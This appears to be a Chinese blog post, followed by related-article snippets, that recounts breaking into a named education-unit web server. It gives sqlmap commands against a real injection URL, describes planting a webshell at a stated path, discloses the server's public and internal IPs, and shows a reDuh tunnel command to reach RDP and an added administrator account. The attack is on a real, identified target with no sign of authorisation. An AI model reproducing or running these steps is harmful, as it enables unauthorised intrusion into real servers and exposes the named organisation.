如何绕过服务器禁止的网站,看我如何SQL注入沦陷一个网站绕过端口限制RDP隧道进服务器...

最新推荐文章于 2023-07-08 14:15:07 发布
最新推荐文章于 2023-07-08 14:15:07 发布
阅读量434 收藏 1
点赞数
文章标签: 如何绕过服务器禁止的网站

网址:http://shy.hpe.sh.cn

一个sql注入导致的服务器沦陷。

一个事业教育单位,今天就上服务器看看.(声明:未有任何破坏性操作)

没事溜达到这个网址:(注入点)

http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169

首先是暴库(16个数据库吧):

sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --dbs

imgpxy.php?url=gnp.321632032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

DBA权限:

imgpxy.php?url=gnp.732952032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

管理员:

imgpxy.php?url=gnp.984762032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

脱裤暴表就没弄了,要这些数据也没啥用。选择了利用这个渗透进服务器。

下面说重点了。os-shell

sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --os-shell

imgpxy.php?url=gnp.110572032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

比较奇怪sqlmap里执行os-shell不顺手,有点问题,现在就是写个马进去就行了。

果断换了种方式写了个一句话:

imgpxy.php?url=gnp.632482032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

之前报错信息已经暴漏了网站的物理地址,马的物理位置:

d:\mainweb\ParentSchool\CN\jxhd\import.aspx

直接上服务器:

imgpxy.php?url=gnp.890292032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

至此,已经拥有了这台服务器的shell了。

上了个文件getinfo.aspx,这个getinfo.aspx是我等下要用到的。

到这里就在想能否RDP进服务器看看。菜刀里看的着实不舒服。

得到的公网IP信息:

Nmap scan report for 210.22.116.91

Host is up (0.011s latency).

Not shown: 999 filtered ports

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS httpd 7.0

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

就开了个80端口。

在菜刀里ipconfig下看到的是:

以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :

本地链接 IPv6 地址. . . . . . . . : fe80::852a:c63b:2d0a:b032%10

IPv4 地址 . . . . . . . . . . . . : 10.11.124.5

子网掩码 . . . . . . . . . . . . : 255.255.255.0

默认网关. . . . . . . . . . . . . : 10.11.124.1

原来是这样的:

公网ip地址:210.22.116.91 这个只开了80端口

内网ip地址:10.11.124.5

要么是防火墙,要么做了端口映射,直接访问内网ip地址:10.11.124.5肯定是不行的了。怎么办?

上面的上传的那个getinfo.aspx文件的作用来了。

这里reDuh隧道穿透了:

java -jar reDuhClient.jar http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx

给大家弄个截图,大致会出现下面界面:

imgpxy.php?url=gnp.223203032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

打开本地1010端口,使用telnet或者nc连接本地的1010端口:

imgpxy.php?url=gnp.482603032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

创建隧道:[createTunnel]1234:127.0.0.1:3389

nc本地1010端口,将本地1234端口与远程的服务器端3389端口绑定

imgpxy.php?url=gnp.670113032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

ok,基本工作均已完成。下面在用菜刀添加个用户:

imgpxy.php?url=gnp.713413032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

密码就不显示了。

提升权限至administrators组

好了,这就全部完成了:

mstsc打开本地127.0.0.1:1234端口,输入刚添加的用户名密码。直接RDP进内网吧:

imgpxy.php?url=gnp.575423032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

这样就想操作你自己的电脑一样了,想干什么就干什么。漏洞证明:

如上。

一句话:

http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/import.aspx

RDP隧道:

http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx修复方案:

过滤

weixin_39782709
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代理服务器squid,绕过屏蔽(云主机云虚拟机)
Java的一只小实习生的博客
11-10 639
(绕过屏蔽) 1. 首先你需要准备一个云主机, 具体是哪家就无所谓了, 但是云主机需要联网 我准备的是阿里云的Ubuntu 服务器 2. 安装squid sudo apt-get install squid 3. 修改配置文件 cd /etc/squid/ ll vi squid.conf 在该文件可以查看squid的一些配置 首先, 端口默认是 3128 , 不做修改 跑到最后 添加一下 header_access Via deny all header_access X-Forwarded-For
使用本地网络搭建代理,绕过公司网络屏蔽
热门推荐
zwyzzz888的博客
01-25 2万+
公司屏蔽了网易云,斗鱼等 ,想用代理绕过屏蔽,达到在公司也可以听歌看视频的目的。 因为穷,没有服务器,就想用家里的电脑的网络转发流量。 按着以上思路前提来想办法。 一、打通网络 让公司的网络能访问到家里电脑的网络 1. 使用内网穿透 因为家里的网络是联通的,没有公网ip,想访问的话,最优先想到的就是内网穿透,映射出一个地址,让公司的电脑可以访问到家里的电脑。 内网穿透的服务有花生壳、nat123等。 这里使用的是小米球的内网穿透,免费的1MB/S。 https://manager.xiao
防止被服务器屏蔽的方法
10-25 414
说明: 在利用python抓取服务器信息时,会给服务器带来压力,所以服务器是不欢迎非人为的访问,就会过滤掉这些访问,造成抓取不成功。 解决方法: 一.用time模块的sleep()方法人为延长访问间隔时间,格式为:time.sleep(secs); 例:time.sleep(3),表示延时3...
[转载]越过服务器联合
Cloud-Datacenter-Renewable Energy-Big Data-Model
08-25 2191
[转载]越过服务器联合 已有 317 次阅读 2011-9-21 12:24 |个人分类:技术翻译|系统分类:观点评述|关键词:虚拟化 【原题】Beyond Server Consolidation 【译题】越过服务器联合 【作者】Werner Vogels 【主题】虚拟化 【题注】服务器联合帮助公司发展了资源利用,不过虚拟化可以另外
利用icmp隧道转发绕过限制
focus on security
05-19 638
步骤 1. icmp隧道实战应用场景。 2. 在建立icmp隧道的两端机器上分别编译安装PingTunnel。 3. 通过icmp隧道来转发常规tcp端口。 基础环境准备 ubuntu16-LAMP 入侵者为公网的一台vps(ubuntu 16.04.3 LTS),相当于隧道客户端,公网 ip: 192.168.3.110。 heightlamp 目标边界的一台 linux web 机器(centOS 7),相当于隧道服务端,公网 ip: 192.168.3.76,内网 ip:...
RDP.rar_RDp_rdp wince _rdp client_rdp connection_rdp.pdf
09-22
RDP,远程显示协议(Remote Display Protocol )简称RDP。提供了客户和服务器之间的连接。该协议是对国际电信联盟发布的一个国际标准的多通道会议协议T.120 的一个扩展。
服务器远程桌面端口修改器 v2.0.zip
07-11
服务器远程桌面端口修改器是一个可以直接一键修改3389端口端口修改工具。 远程端口作为服务器安全管理的首要安全操作之一,每次修改注册表等操作比较麻烦,并且需要重启才能生效,天互数据特别推出【远程桌面端口...
RDP 协议组件 X.224 在协议流中发现一个错误并且中断了客户端连接的解决方法
01-10
今天一个客户反映,远程桌面无法连接 ,我看了一下,ping都是正常的,telnet了一下远程端口,也是可以连接的,但是远程桌面却总是连不上,就先帮他重启了一下。重启后,远程可以登入了,就去查看了一下服务器日志,...
rdp.rar_RDp_site:www.pudn.com_vba rdp_vba 批量_批量远程
09-24
批量远程终端RDP生成器,不再需要手工一个一个生成.
windows服务器.rdp
11-21
windows服务器.rdp
如何设置绕过服务器登陆网页,如何绕过本地服务器打开网页
weixin_39538607的博客
07-30 803
2007-04-02请问在网页中如何打开本地应用程序?就像web讯雷打开已下载的程序文件一样,是直接从硬盘打开。如果用一个链接指向一个文件时,是下载的提示。我察看了web迅雷所打开的网页代码,没有看明白是如何控制的。我在网上查到了另外一种方式,用脚本控制,代码如下:打开记事本等系统目录下的程序都是很正常的,但是我要打开以下程序就不行了:'C:\\Program Files\\eXeScope\\e...
越过游戏服务器修改,“撬锁”实战:绕过云锁提权某游戏私服
weixin_35916466的博客
08-09 854
原标题:“撬锁”实战:绕过云锁提权某游戏私服严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。前言朋友给我了我一个游戏私服的shell,说是提权不下服务器,让我帮忙看看。本文仅为大家提供一个思路,这个方法可能很多人知道但是并没有公布到网络。我今天写出来只是为了让小白们少走一点弯路,开拓一下思路,还请大牛勿喷。请注意:本次测试已经通知管理员并已帮助其修复漏洞!背景朋友给我了我一个游戏私服的she...
网站反屏蔽常见的六大方法
weixin_30375427的博客
11-30 330
很多网站管理员可能会遇到这种情况,自己的网站突然之间无法从国内访问了,遇到这种情况后,网站主如何应对,这里速腾数据就介绍几个站长反屏蔽的常见方法。 1、网站使用多个IP地址; 最简单的方式是使用CDN服务,针对不同的国家地区使用不同的IP,这样的一个好处是,即使一个IP无法访问,用户可以通过hosts的方式来修改IP继续访问。 2、网站域名和架构简单; 网站域名规则简单,所有服务...
手把手教你绕过403访问资源
最新发布
MachineGunJoe666
07-08 4826
在浏览网站的时候,经常会遇到403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器端有能力处理该请求,但是拒绝授权访问。这就意味着这里面有东西,我们只需绕过它。
sql注入绕过方法总结
nigo134的博客
06-17 2741
转至:sql注入绕过方法总结_huanghelouzi的博客-CSDN博客_sql绕过 我们希望用户输入的 id 的值,仅仅是一个字符串,传入数据库执行,但是当输入了: 2 or 1=1 时,其中的 or 1=1 是作为了 sql语句 来执行的。常用的注释符有 实例 大小写绕过 常用于 的正则对大小写不敏感的情况,一般都是题目自己故意这样设计。 例如:waf过滤了关键字,可以尝试使用等绕过。 内联注释绕过 内联注释就是把一些特有的仅在MYSQL上的语句放在 中,这样这些
Kali Linux渗透测试之服务扫描(一)——Banner、服务识别、操作系统识别
橘子女侠
04-16 3457
服务扫描: 不能简单的通过端口号来识别服务,目标系统开放80端口不一定开放着http服务,要通过对目标系统行服务扫描,来识别开放的端口后面到底是什么服务,运行什么样的应用; 1. 服务扫描——Banner(简单但不准确) 通过连接服务器端口,使其返回的banner信息,可能查不到,也可能是管理员伪造的; 通过软件开发商,软件名称,服务类型,版本号(直接发现已知的漏洞和弱点); 对...
HTB靶场系列 Windows靶机 Legacy靶机
m0_57221101的博客
01-27 1936
勘探 常规nmap扫描 root@kali# nmap 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:30 EST Nmap scan report for 10.10.10.4 Host is up (0.018s latency). Not shown: 65532 filtered ports
RDP 协议组件 X.224 在协议流中发现一个错误并且中断了客户端连接
05-25
RDP(Remote Desktop Protocol)协议中的X.224是一个在TCP/IP上的基础协议,它负责建立连接并提供一些基础服务,如流量控制、消息序列化和错误检测。当X.224在协议流中发现错误时,它会打断客户端连接,以确保数据的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值